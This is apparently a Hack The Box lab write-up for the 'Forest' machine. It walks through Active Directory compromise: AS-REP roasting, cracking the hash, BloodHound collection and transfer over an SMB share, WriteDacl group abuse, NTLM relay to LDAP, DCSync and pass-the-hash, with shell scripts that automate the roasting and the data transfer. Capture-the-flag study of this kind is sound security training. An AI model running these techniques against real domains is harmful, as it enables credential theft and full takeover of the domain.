Forest — HTB walkthrough

Dhanishtha Awasthi
5 min read | Jul 15, 2020

As the name suggests, you will come across a dense set of Active Directory nodes. Given the tree structure of LDAP directories, it is named Forest. At least that is my guess!

ENUMERATION

Nmap Scan

The scan shows a domain controller (Kerberos, LDAP, SMB/RPC and WinRM are all open). We get the host name FOREST.htb.local (domain htb.local); add it to /etc/hosts.

RPC ENUMERATION

A null session is allowed, so rpcclient's enumdomusers lists every domain account. Make a user list (one account name per line) from that output; we will need it for the Kerberos step.

SMB ENUMERATION

Anonymous login succeeds, but no shares are visible.

KERBEROS 88

With the user list we created above, we try AS-REP roasting: any account that has Kerberos pre-authentication disabled will hand an unauthenticated client an AS-REP encrypted with the account's password hash, which can then be cracked offline.

This gives us a hash for one account: svc-alfresco.

CRACKING HASH

Using john with rockyou.txt, we crack the hash.

User = svc-alfresco : Password = s3rvice
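The enumerate-to-crack pipeline above as one script, added here as an example (it is not the post's own commands). It turns rpcclient's enumdomusers output into a user list, keeps only the $krb5asrep$ lines from GetNPUsers.py's output and hands them to john. The DC address 10.10.10.161, the domain htb.local and the rockyou.txt path are assumptions; the live run only fires with RUN_LIVE=1, so the parsing functions can be exercised offline on the constructed sample at the bottom.

```shell
#!/bin/sh
# Added example, not the original post's code. Assumed: DC reachable at $DC
# (10.10.10.161), domain $DOMAIN (htb.local), impacket scripts and john on $PATH.
DC=${DC:-10.10.10.161}
DOMAIN=${DOMAIN:-htb.local}
WORDLIST=${WORDLIST:-/usr/share/wordlists/rockyou.txt}

# Account names from rpcclient 'enumdomusers' lines such as
#   user:[svc-alfresco] rid:[0x47b]
# Reads the files given as arguments, or stdin when there are none.
extract_users() {
  sed -n 's/^user:\[\([^]]*\)\].*/\1/p' "$@"
}

# GetNPUsers.py prints one $krb5asrep$ line per roastable account plus status
# text for every other user; keep only the hashes so john gets a clean file.
extract_asrep_hashes() {
  grep -E '^\$krb5asrep\$' "$@"
}

# Account name out of a $krb5asrep$23$user@REALM:... hash (john format).
asrep_user() {
  sed -n 's/^\$krb5asrep\$23\$\([^@]*\)@.*/\1/p' "$@"
}

# Live pipeline: null-session RPC -> user list -> AS-REP roast -> john.
run_live() {
  rpcclient -U '' -N "$DC" -c enumdomusers | extract_users > users.txt
  GetNPUsers.py "$DOMAIN/" -usersfile users.txt -dc-ip "$DC" -no-pass -format john \
    | extract_asrep_hashes > asrep.john
  [ -s asrep.john ] || { echo "no account with pre-auth disabled" >&2; return 1; }
  echo "roastable: $(asrep_user asrep.john | tr '\n' ' ')"
  john --wordlist="$WORDLIST" asrep.john
  john --show asrep.john
}

# Constructed sample input (not real output from the box) so the parsers can
# be checked without touching the network.
SAMPLE_RPC='user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[svc-alfresco] rid:[0x47b]'
SAMPLE_NPUSERS='[-] User Administrator doesn'\''t have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-alfresco@HTB.LOCAL:0011223344556677889900aabbccddee$ff00112233445566778899aabbccddeeff'

if [ "${RUN_LIVE:-0}" = 1 ]; then
  run_live
else
  printf '%s\n' "$SAMPLE_RPC" | extract_users
  printf '%s\n' "$SAMPLE_NPUSERS" | extract_asrep_hashes | asrep_user
fi
```

Run it as RUN_LIVE=1 DC=<dc-ip> sh roast.sh against the box; without RUN_LIVE it only demonstrates the parsers on the sample.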

CRACKMAPEXEC verification

Using crackmapexec to check whether the credentials are usable over SMB and WinRM.

They get us nowhere over SMB, but WinRM works.

EXPLOITATION

Log in over WinRM (evil-winrm) as svc-alfresco and grab user.txt.

PRIVILEGE ESCALATION

After enumerating and playing around, I found I couldn't execute any scripts, so we will do AD enumeration with BloodHound instead.

For this, first download SharpHound (the BloodHound collector) on your Kali box and then transfer it to the Windows target.

Refer: https://bloodhound.readthedocs.io/en/latest/data-collection/sharphound.html

Download the collector on the attacker machine, transfer it, and run it on the target.

After a minute or two the collector finishes and a zip file appears in the working directory.

Download this zip to our machine, where we will analyse it with BloodHound. You can use evil-winrm's built-in download utility for this.

Or, the trivial way, which I used: smbserver.py.

On the attacker machine, keep smbserver.py running on a share.

On the target machine, copy the zip to that share.

Note that afterwards you need to delete the zip on the target and disconnect the share mapping: clearing your traces.
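The attacker side of that transfer as a script, added here as an example rather than the post's own commands. It starts impacket's smbserver.py on a share directory, waits for a *BloodHound.zip to land and stop growing, stops the server, and checks the file really is a zip before it goes into BloodHound. The share name, the relay:relay credentials and the share directory are made-up assumptions; the live part only runs with RUN_LIVE=1.

```shell
#!/bin/sh
# Added example, not from the original post. Receives the SharpHound zip that
# the target copies into an impacket smbserver share, then sanity-checks it.
# Assumptions: smbserver.py on $PATH; share name and credentials are made up.
SHARE_DIR=${SHARE_DIR:-/tmp/share}
SHARE_NAME=${SHARE_NAME:-share}

# Print the path of the first *BloodHound.zip in $1 once its size has been
# stable across two polls (a copy over SMB may still be in flight).
# Gives up after $2 seconds (default 300) and returns 1.
wait_for_zip() {
  dir=$1; limit=${2:-300}; last=-1; waited=0
  while [ "$waited" -lt "$limit" ]; do
    f=$(ls "$dir"/*BloodHound.zip 2>/dev/null | head -n 1)
    if [ -n "$f" ]; then
      size=$(wc -c < "$f" | tr -d ' ')
      if [ "$size" -eq "$last" ] && [ "$size" -gt 0 ]; then
        echo "$f"; return 0
      fi
      last=$size
    fi
    sleep 1; waited=$((waited + 1))
  done
  return 1
}

# A zip starts with the local-file-header magic "PK\003\004".
is_zip() {
  [ "$(head -c 2 "$1" 2>/dev/null)" = "PK" ]
}

run_live() {
  mkdir -p "$SHARE_DIR"
  # -smb2support is needed for modern Windows clients; an authenticated share
  # avoids the client's guest-access policy blocking the copy.
  smbserver.py -smb2support -username relay -password relay "$SHARE_NAME" "$SHARE_DIR" &
  srv=$!
  printf '%s\n' "on the target: net use \\\\<your-ip>\\$SHARE_NAME /user:relay relay" \
                "               copy *BloodHound.zip \\\\<your-ip>\\$SHARE_NAME\\"
  zip=$(wait_for_zip "$SHARE_DIR") || { kill "$srv"; echo "no zip arrived" >&2; return 1; }
  kill "$srv"
  is_zip "$zip" || { echo "$zip is not a zip file" >&2; return 1; }
  sha256sum "$zip"
  printf '%s\n' "clean up on the target: del *BloodHound.zip" \
                "                        net use \\\\<your-ip>\\$SHARE_NAME /delete"
}

if [ "${RUN_LIVE:-0}" = 1 ]; then run_live; fi
```

The size-stability check matters more than it looks: BloodHound rejects a truncated zip, and it is easy to grab the file while the SMB copy is still writing it.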

To analyse the contents of the zip, install BloodHound on your own machine.

Run neo4j console, then bloodhound. A message will appear telling you the database is up.

Browse to http://127.0.0.1:7474/ and you get a login prompt. Log in with the default credentials (user neo4j, password neo4j) and change the password.

Now run BloodHound.

Log in with the new password.

On the blank screen that appears after login, drag and drop your zip file.

The file is processed in the background. Then run a few of the built-in queries (for example the shortest paths to Domain Admins), as shown.

A graph is drawn as soon as the query runs.

You can see a path from svc-alfresco to Domain Admins that goes through a WriteDacl edge on the domain object.

Right-click the WriteDacl edge and choose Help: it explains what the abuse does and how to carry it out.

Steps to exploit the WriteDacl privilege

So svc-alfresco can add accounts to the Exchange Windows Permissions group, and that group holds WriteDacl on the domain. We can either create a new user for this or use svc-alfresco itself.

1) net group "Exchange Windows Permissions" n00bDi /add (the n00bDi account must already exist for this one-liner to work)

Or you can create the account in PowerShell and follow the steps below:

2.1) $pass = ConvertTo-SecureString "password12" -AsPlainText -Force

2.2) New-ADUser n00bDi -AccountPassword $pass -Enabled $True

Note that command 2.2 reports that the account already exists if you used step 1 instead. Finally we give n00bDi the Exchange Windows Permissions membership:

3) Add-ADGroupMember -Identity "Exchange Windows Permissions" -Members n00bDi

4) Querying the members of "Exchange Windows Permissions" confirms that n00bDi is in the group.

Now we run ntlmrelayx.py to relay n00bDi's authentication to LDAP on the domain controller, where the group's WriteDacl right is used to escalate n00bDi's privileges (ntlmrelayx's --escalate-user option grants the relayed account replication, i.e. DCSync, rights). Relaying to LDAP only works when the DC does not enforce LDAP signing, which is the default.

NTLMRELAYX.PY performs NTLM relay attacks: it starts SMB and HTTP servers and relays the credentials it receives to other protocols (SMB, HTTP, MSSQL, LDAP, IMAP, POP3, etc.). It can run predefined attacks that trigger when a connection is relayed (e.g. creating a user through LDAP), or run in SOCKS mode, in which every relayed connection stays available for reuse through a SOCKS proxy. In effect it acts as a man-in-the-middle.

In a browser, go to http://127.0.0.1 (ntlmrelayx's HTTP listener) and log in as n00bDi:password12; the browser's NTLM authentication is what gets relayed.

ntlmrelayx.py reports success.

Now, as n00bDi, we use secretsdump.py to pull the domain hashes from the DC.

We get the LM:NTLM hash for Administrator.

Pass the hash with evil-winrm (-H takes the NT hash in place of a password).

ROOTED!!!
